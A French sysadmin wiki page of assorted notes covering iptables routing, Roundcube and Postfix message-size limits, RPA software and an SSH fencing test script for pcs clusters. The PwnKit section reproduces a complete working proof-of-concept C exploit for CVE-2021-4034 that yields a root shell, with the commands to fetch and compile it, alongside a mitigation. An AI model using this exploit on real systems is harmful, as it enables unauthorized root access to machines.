Outils pour utilisateurs

Outils du site


blog

Routage sous GNU/Linux

echo 1 > /proc/sys/net/ipv4/ip_forward

Autoriser tout

iptables -P FORWARD ACCEPT

Autoriser eth0 à accéder à Internet

iptables -A FORWARD -i eth0 -o ppp0 -m state --state NEW,ESTABLISHED,RELATED -j ACCEPT
iptables -A FORWARD -i ppp0 -o eth0 -m state --state ESTABLISHED,RELATED -j ACCEPT

Exemple de conf

-A INPUT -i virbr4 -p udp -m udp --dport 53 -j ACCEPT
-A INPUT -i virbr4 -p tcp -m tcp --dport 53 -j ACCEPT
-A INPUT -i virbr4 -p udp -m udp --dport 67 -j ACCEPT
-A INPUT -i virbr4 -p tcp -m tcp --dport 67 -j ACCEPT
-A FORWARD -d 192.168.2.0/24 -i enp130s0 -o virbr4 -j ACCEPT
-A FORWARD -s 192.168.2.0/24 -i virbr4 -o enp130s0 -j ACCEPT
-A FORWARD -i virbr4 -o virbr4 -j ACCEPT
-A FORWARD -o virbr4 -j REJECT --reject-with icmp-port-unreachable
-A FORWARD -i virbr4 -j REJECT --reject-with icmp-port-unreachable
-A OUTPUT -o virbr4 -p udp -m udp --dport 68 -j ACCEPT
2025/03/24 15:06

Roundcube pb de taille msg Le fichier téléversé dépasse la taille maximale de 2,0 Mo

Erreur “Le fichier téléversé dépasse la taille maximale de 2,0 Mo”

/etc/php/7.0/fpm/php.ini

upload_max_filesize = 2M

/etc/php/7.0/fpm/php.ini

post_max_size = 8M
systemctl restart php7.0-fpm.service

Autres

Erreur SMTP : Message size exceeds server limit
postconf -d | grep message_size_limit
message_size_limit = 10240000

(10240000 / 1024) / 1024 = 9,76 Mo

postconf -e 'message_size_limit = 20240000'
systemctl reload postfix
2025/03/24 15:06

Rootkit pwnkit - local privilege escalation vulnerability pkexec cve-2021-4034

Voir aussi :

2022-01-27

12 ans que GNU/Lunix était vulnérable

Source :

cve-2021-4034-poc.c

/*
 * Proof of Concept for PwnKit: Local Privilege Escalation Vulnerability Discovered in polkit’s pkexec (CVE-2021-4034) by Andris Raugulis <moo@arthepsy.eu>
 * Advisory: https://blog.qualys.com/vulnerabilities-threat-research/2022/01/25/pwnkit-local-privilege-escalation-vulnerability-discovered-in-polkits-pkexec-cve-2021-4034
 */
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
 
char *shell = 
	"#include <stdio.h>\n"
	"#include <stdlib.h>\n"
	"#include <unistd.h>\n\n"
	"void gconv() {}\n"
	"void gconv_init() {\n"
	"	setuid(0); setgid(0);\n"
	"	seteuid(0); setegid(0);\n"
	"	system(\"export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin; rm -rf 'GCONV_PATH=.' 'pwnkit'; /bin/sh\");\n"
	"	exit(0);\n"
	"}";
 
int main(int argc, char *argv[]) {
	FILE *fp;
	system("mkdir -p 'GCONV_PATH=.'; touch 'GCONV_PATH=./pwnkit'; chmod a+x 'GCONV_PATH=./pwnkit'");
	system("mkdir -p pwnkit; echo 'module UTF-8// PWNKIT// pwnkit 2' > pwnkit/gconv-modules");
	fp = fopen("pwnkit/pwnkit.c", "w");
	fprintf(fp, "%s", shell);
	fclose(fp);
	system("gcc pwnkit/pwnkit.c -o pwnkit/pwnkit.so -shared -fPIC");
	char *env[] = { "pwnkit", "PATH=GCONV_PATH=.", "CHARSET=PWNKIT", "SHELL=pwnkit", NULL };
	execve("/usr/bin/pkexec", (char*[]){NULL}, env);
}
curl https://raw.githubusercontent.com/arthepsy/CVE-2021-4034/main/cve-2021-4034-poc.c
gcc cve-2021-4034-poc.c
$ ./a.out
#

Solution

Mise à jours ou

$ ls -l /usr/bin/pkexec
-rwsr-xr-x 1 root root 23440  3 juin   2021 /usr/bin/pkexec

$ LANG=C stat /usr/bin/pkexec |grep ^Access
Access: (4755/-rwsr-xr-x)  Uid: (    0/    root)   Gid: (    0/    root)
Access: 2022-01-27 14:01:49.383667085 +0100

$ sudo chmod -s /usr/bin/pkexec
2025/03/24 15:06

Robotic Process Automation (RPA)

Voir aussi :

  • Process Mining

Logiciels :

<https://fr.wikipedia.org/wiki/AutoHotkey|AutoHotkey (windows)>

  • OpenRPA

Logiciels privateurs :

  • uipath (Process Mining)
2025/03/24 15:06

Script de test STONITH fencing cluster

Voir :

Voir aussi :

Source :

Ce script permet d'émuler le “fencing” via SSH, à des fins de test. Compatible cman, pacemaker et pcs

/usr/sbin/fence_ssh

#!/bin/sh
 
# A fence agent for cman and pacemaker, using ssh.
# The only required argument is nodename.
# Author:
#        klwang (http://klwang.info)
# Note:
#        authorized_keys configuration are required
#        just for test, enjoy it!
# Source : https://github.com/wklxd/misc/blob/master/fence_ssh
 
 
SSH_COMMAND="/usr/bin/ssh -q -x -o PasswordAuthentication=no -o StrictHostKeyChecking=no -n -l root"
#REBOOT_COMMAND="echo '/sbin/reboot -nf' | SHELL=/bin/sh at now >/dev/null 2>&1"
REBOOT_COMMAND="shutdown -r now >/dev/null 2>&1"
nodename=
action=reboot
 
usage () {
    /bin/echo "Usage: $0 -n NAME [-o ACTION]"
    /bin/echo
    /bin/echo " -n NODENAME"
    /bin/echo "   The name of the node to be fenced."
    /bin/echo "   In case it contains spaces, use double quotes."
    /bin/echo " -o ACTION"
    /bin/echo "   What to do; on|off|list|monitor|reboot(default)."
    /bin/echo
    exit 0
}
 
arg_cmd() {
    while getopts ":n:p:o:h" opt; do
        case "$opt" in
        n|p)
            nodename=$OPTARG
            ;;
        o)
            action=$OPTARG
            ;;
        h)
            action="usage"
            ;;
        *)
            usage
            ;;
        esac
    done
}
 
arg_stdin() {
    eval $(cat -)
    if [ "x$nodename" = "x" -a "x$port" != "x" ]; then
        nodename=$port         # pacemaker only use port
    fi
}
 
metadata() {
 
cat <<EOF
<?xml version="1.0" ?>
<resource-agent name="fence_ssh" shortdesc="ssh fence agent, work both for cman and pacemaker">
<longdesc>
The style come from fence_pcmk, http://www.clusterlabs.org
Some functions references external/ssh agent
</longdesc>
<vendor-url> http://klwang.info </vendor-url>
<parameters>
        <parameter name="action" unique="1">
                <getopt mixed="-o" />
                <content type="string" default="reboot" />
                <shortdesc lang="en">Fencing Action</shortdesc>
        </parameter>
        <parameter name="nodename" unique="1">
                <getopt mixed="-n" />
                <content type="string"  />
                <shortdesc lang="en">Name of machine</shortdesc>
        </parameter>
        <parameter name="port" unique="1">
                <getopt mixed="-p" />
                <content type="string"  />
                <shortdesc lang="en">Name of machine, equal to nodename</shortdesc>
        </parameter>
        <parameter name="help" unique="1">
                <getopt mixed="-h" />
                <content type="string"  />
                <shortdesc lang="en">Display help and exit</shortdesc>
        </parameter>
</parameters>
<actions>
        <action name="reboot" />
        <action name="on" />
        <action name="off" />
        <action name="list" />
        <action name="status" />
        <action name="metadata" />
</actions>
</resource-agent>
EOF
 
    exit 0
}
 
get_usable_ip() {
 
    for ip in `/usr/bin/getent hosts $1 | cut -d" " -f1`; do
        if ping -w1 -c1 $ip > /dev/null 2>&1
        then
            echo $ip
            return 0
        fi
    done
    return 1
 
}
 
is_host_up() {
 
    for j in 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15; do
        if
            ping -w1 -c1 "$1" >/dev/null 2>&1
        then
            sleep 1
        else
            return 1
        fi
    done
    return 0
 
}
 
reboot() {
 
    local node=$1
    ip=`get_usable_ip $node`
    if [ $? -ne 0 ];then
        /bin/echo "Error: can not get a usable ip, is nodename($node) alive!"
        exit 0                       # in case power lose
    fi
 
    if ! ping -c1 -w1 $ip >/dev/null 2>&1; then
        exit 0                       # in case the node have been fenced
    fi
 
    $SSH_COMMAND $ip "echo $(date +'%Y-%m-%d %H:%M') FENC_FROM_SSH \$SSH_CLIENT >> /var/log/fenc.log"
    $SSH_COMMAND $ip "$REBOOT_COMMAND"
 
    if `is_host_up $ip`; then
        exit 1
    else
        exit 0
    fi
 
}
 
#main
 
if [ $# -gt 0 ]; then
    arg_cmd $*
else
    arg_stdin
fi
 
 
case "$action" in
 
    metadata)
        metadata
        ;;
    usage)
        usage
        ;;
    on|off)
        exit 0        # ssh can not turn on a node
                      # so avoiding turn it down
        ;;
    reset|reboot)
        reboot $nodename
        ;;
    monitor)
        exit 0        # just for pacemaker
        ;;
    help)
        usage
        ;;
    *)
        /bin/echo "Unkonw options"
        exit 1
        ;;
esac

Configuration

pcs stonith create fencessh_node1 fence_ssh nodename=node1 pcmk_host_list=node1
pcs stonith create fencessh_node2 fence_ssh nodename=node2 pcmk_host_list=node2
pcs stonith level add 1 node1 fencessh_node1
pcs stonith level add 1 node2 fencessh_node2
 
# Interdire le fence de soi-même
pcs constraint location fencessh_node1 avoids node1
pcs constraint location fencessh_node2 avoids node2

Test

pcs stonith fence node2

Autres

Lister

pcs stonith list
stonith_admin -I
2025/03/24 15:06
blog.txt · Dernière modification : de 127.0.0.1

Donate Powered by PHP Valid HTML5 Valid CSS Driven by DokuWiki